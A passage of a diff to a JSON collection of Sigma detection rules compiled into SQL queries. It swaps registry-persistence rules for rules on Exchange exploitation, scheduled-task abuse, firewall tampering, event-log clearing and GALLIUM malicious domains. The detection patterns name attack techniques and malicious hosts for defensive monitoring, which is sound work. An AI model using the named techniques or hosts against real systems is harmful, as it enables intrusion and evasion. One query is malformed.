\"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", - "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "status": "experimental", + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", + "id": "04b60639-39c0-412a-9fbe-e82499c881a3", + "status": "experimental", + "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2032', '2060'))" + ], + "filename": "win_firewall_as_reset_config.yml" + }, + { + "title": "Windows Firewall Settings Have Been Changed", + "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "status": "experimental", + "description": "Detects activity when the settings of the Windows firewall have been changed", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2083', '2003', '2082', '2008'))" ], + "filename": "win_firewall_as_setting_change.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion" + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "status": "experimental", + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "falsepositives": [ - "Unknown" + "filename": "win_firewall_as_delete_rule.yml" + }, + { + "title": "The Windows Defender Firewall Service Failed To Load Group Policy", + "id": "7ec15688-fd24-4177-ba43-1a950537ee39", + "status": "experimental", + "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" ], + "filename": "win_firewall_as_failed_load_gpo.yml" + }, + { + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Firewall Rule Modified In The Windows Firewall Exception List", + "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "description": "Detects when a rule has been modified in the windows firewall exception list", "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2005', '2073') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "win_firewall_as_change_rule.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate admin script" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN 